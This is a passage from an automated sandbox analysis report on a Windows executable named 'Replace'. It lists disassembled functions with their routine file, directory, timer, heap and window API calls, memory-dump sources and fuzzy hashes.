                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryRemove$ApisFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3215702115-0
                                                                                                                                                                                                              • Opcode ID: 91df346512e07775874034638f6e0d12c5f46c049a8d016bc16b9962a779da0a
                                                                                                                                                                                                              • Instruction ID: ee1d3078a7a58064403bd86a67f3663806fb4b4b686e4acfcd6b602198934673
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91df346512e07775874034638f6e0d12c5f46c049a8d016bc16b9962a779da0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1E09235900154ABCF212B74A825ADE77D49B11744F0045D5EC11A7195EFB0C805A7D1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB30F3 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00BB3126
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BB310F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Attributes$Apis
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2164219574-0
                                                                                                                                                                                                              • Opcode ID: fc12a5e3975c902f9b3be5d0b301a804e666ef4abb8c84c784c88a8bcec36f6a
                                                                                                                                                                                                              • Instruction ID: 5030a4f788c083bf9e6adfcb72734953c2133e326e4a6c334dc101d73946aafa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc12a5e3975c902f9b3be5d0b301a804e666ef4abb8c84c784c88a8bcec36f6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96E01A32B00554ABCF292778AC6699DB7E49B45765F0086AAF922E32E0EF60C9458681
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB7EBF Relevance: 3.0, APIs: 2, Instructions: 25timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • KillTimer.USER32(00008001,00000003), ref: 00BB7ED7
                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(00008001,00000000), ref: 00BB7F07
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CallbackDispatcherKillTimerUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 45433635-0
                                                                                                                                                                                                              • Opcode ID: cc73563847068091c4a75776a4e7d87cc6ba445419c27b1d3b58a9d60e1dbc2b
                                                                                                                                                                                                              • Instruction ID: eec3f413198755fd2a0896147b62d93da64245a4d46aea56f390c2abb9c40390
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc73563847068091c4a75776a4e7d87cc6ba445419c27b1d3b58a9d60e1dbc2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1F0F831148741EBDB729B10C849BABBFE5BF80705F148C9EF096159A0CBB1A894DB55
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB2AA0 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,-00000086,000001E4), ref: 00BB2AD3
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,74DF2EE0,?,-00000086,000001E4), ref: 00BB2ABC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory$ApisFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4088297939-0
                                                                                                                                                                                                              • Opcode ID: 87d0132fecec9dc36049409627312a82b99909eca39b7c8c738370f613457ebe
                                                                                                                                                                                                              • Instruction ID: 14789e248d674508a80e801edcaedaf997e2ed745d07e4eab5a09b46329242ad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87d0132fecec9dc36049409627312a82b99909eca39b7c8c738370f613457ebe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1E02631D01118ABCF212B70A826FDEB7E4EF00350F008AE9EC01A71A0FF70884487C0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BBCA67 Relevance: 2.6, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00BBCA76
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BBCAFA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                              • Opcode ID: c429dc0628a2d1b9756e11e216336507c4a1d925e2d95bdad72725b494a52376
                                                                                                                                                                                                              • Instruction ID: fb77a6504b9a6ccc0529f13efaa232a0a18a6edd508b3fdcd052302ca00ba69e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c429dc0628a2d1b9756e11e216336507c4a1d925e2d95bdad72725b494a52376
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0821ACB5200706EF8308CF5AE984C56FBF9FF887147018A9AE95897721D771F950CAA2
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BBB085 Relevance: 1.9, APIs: 1, Instructions: 403COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3886170330-0
                                                                                                                                                                                                              • Opcode ID: b02db1719b207eb0ef4ebbdd98b5543887c51553c1033f43e4611cb8984def6c
                                                                                                                                                                                                              • Instruction ID: 88afa165b8c268f18eeda237064d929c68bd9eb9dcd07821e2fa0782cf8662e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b02db1719b207eb0ef4ebbdd98b5543887c51553c1033f43e4611cb8984def6c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67F15B71A006469FDB25DF68C495FEDBBE1FF18300F1484ADE459AB252DBB0E980CB94
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BBE1C4 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3886170330-0
                                                                                                                                                                                                              • Opcode ID: baf3d1460dd84fc867addffeb2ba72eb22ce7e5c58f28a44e428ade3a829b297
                                                                                                                                                                                                              • Instruction ID: 43e910421972de768e21e7b9836365b942a880bc0886ac2fe0f84ab36ae3cf58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: baf3d1460dd84fc867addffeb2ba72eb22ce7e5c58f28a44e428ade3a829b297
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F21104343042015BDB14EF18D881BFAB7D9EF89304F1000E9F810AB353DAB5ED098761
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD22DB Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 065c5b744396188ade9116cf1ccae4f6a74079a42555283a4b6ee2cb74ed6c1f
                                                                                                                                                                                                              • Instruction ID: f6254bb8f2c760f3ce70b8aafdbdc9f08756846da78642f16e1dcbf30fbb02be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 065c5b744396188ade9116cf1ccae4f6a74079a42555283a4b6ee2cb74ed6c1f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F701F5337002A19F9B168F6AECC0A5A77D6EBE037072441A2FA05CB294FE34DC019798
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC5E3B Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 00BC5E76
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DestroyWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3375834691-0
                                                                                                                                                                                                              • Opcode ID: 72873584cd45096128b98fee1899c26a713bffe7af4dbbab36b864695df3a352
                                                                                                                                                                                                              • Instruction ID: 44d158d893812b18aa08ba62098c1414cbe286e20d7b265071554f65040f23a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72873584cd45096128b98fee1899c26a713bffe7af4dbbab36b864695df3a352
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD114972500B41DFCB249F25C816F9AB7F4FF04714F108DADE592A6AA0DB76A980CF40
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB7CF6 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000402,00000000,00000000), ref: 00BB7D52
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                              • Opcode ID: 1900a4445d2fbef1ceb60fb9404ed4e1e3ec2f9873d9dcebde656e2a6699e586
                                                                                                                                                                                                              • Instruction ID: 92b018fe92c83217165b39db40d8d9e36442efc93d6e90c7ba16981dc33e2ee8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1900a4445d2fbef1ceb60fb9404ed4e1e3ec2f9873d9dcebde656e2a6699e586
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E10188B12447045BC7349E15D8C0A7BF3E6FFD4791B154EBEE48697A50DEF1B80086A4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB46C1 Relevance: 1.5, APIs: 1, Instructions: 37timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB227E: CreateFileA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 00BB22B6
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000018,00000000,000000FF,00000000,?,80000100,00000001,00000003,00000080,00000000,00000000,00000000,00000000,?,00BB5DD6,?), ref: 00BB4712
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreateTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1043708186-0
                                                                                                                                                                                                              • Opcode ID: 7c1df8356aac98789f6919349203b07875705d016c69b9463f09f8a468595386
                                                                                                                                                                                                              • Instruction ID: ef4179cf3a54444371026744476ee5aaceac630daebfef62e176edf5cc153313
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c1df8356aac98789f6919349203b07875705d016c69b9463f09f8a468595386
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71F0C270645344BAFB254A148C06BE67FD89B02764F20428DE895AB1E1C7A1AD45C664
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD277D Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,-00000086,-00000126,?,00BCC0D5,-00000086,00000022,00BB16C5,00000008,74DF2EE0,00BCB6C9), ref: 00BD27AF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 04aa527bb89b591af87ffef164e993cc6e9b83b3531e1413b69254fc42b03934
                                                                                                                                                                                                              • Instruction ID: 2c95ffbb1405e3a2295de25beaa6ba7a7810b17b65ba85961c9402dd63004f46
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04aa527bb89b591af87ffef164e993cc6e9b83b3531e1413b69254fc42b03934
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58E0ED351002A0A6EA3237699C84F6BFAC8EFA17B0F1501A3EC1996390FF20CC0085E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC5CF2 Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB45A0: WaitForSingleObject.KERNEL32(?,000000FF,00BC5E12,?,?,?,?,-00000086,000001E4), ref: 00BB45A3
                                                                                                                                                                                                                • Part of subcall function 00BB45A0: GetLastError.KERNEL32(?,?,?,?,-00000086,000001E4), ref: 00BB45AE
                                                                                                                                                                                                              • PostMessageA.USER32(00000001,00008001,00000000,00000000), ref: 00BC5D31
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastMessageObjectPostSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1021788411-0
                                                                                                                                                                                                              • Opcode ID: 5825cfd024a86de27af2ab65cfdb0423c579b920b4ffa5004a3880115b8f18e2
                                                                                                                                                                                                              • Instruction ID: ad866e7c87fb7dbc99cc7fad360a8668e6282790a60f557594de24d22c45b4db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5825cfd024a86de27af2ab65cfdb0423c579b920b4ffa5004a3880115b8f18e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F09A71644B80AFD7218F14CD81F56BBE8FB05B10F5049AAE55397AE1DBB5B800CB44
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB4A00 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3886170330-0
                                                                                                                                                                                                              • Opcode ID: 8c4825ab59999d709ce07897553f8addc3e71efce56670f09ff391f031d83807
                                                                                                                                                                                                              • Instruction ID: 69346fdda534a9906b164a8ee34b79ee366e076f37bce8f48d8242f2d1e48f9f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c4825ab59999d709ce07897553f8addc3e71efce56670f09ff391f031d83807
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75F0F839201216DBC714EF64C048A69B7A0FF45716B258499A8859B342DB32DD42CB54
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB2434 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00BB2454
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                                              • Opcode ID: cea39f27d83d23e0ee2b390aa92c069351bd0d2260852b326325c05a677b1e1c
                                                                                                                                                                                                              • Instruction ID: 0f43b45add176b4b11a4daba7528f9c442ccfe38af870225bbe4ff6560d54b6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cea39f27d83d23e0ee2b390aa92c069351bd0d2260852b326325c05a677b1e1c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E01232200208FFDB01CFA4C801F8EB7BAEF08314F108069E919D7260D738EA54EB56
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB2407 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00BB241D
                                                                                                                                                                                                              Memory Dump Source
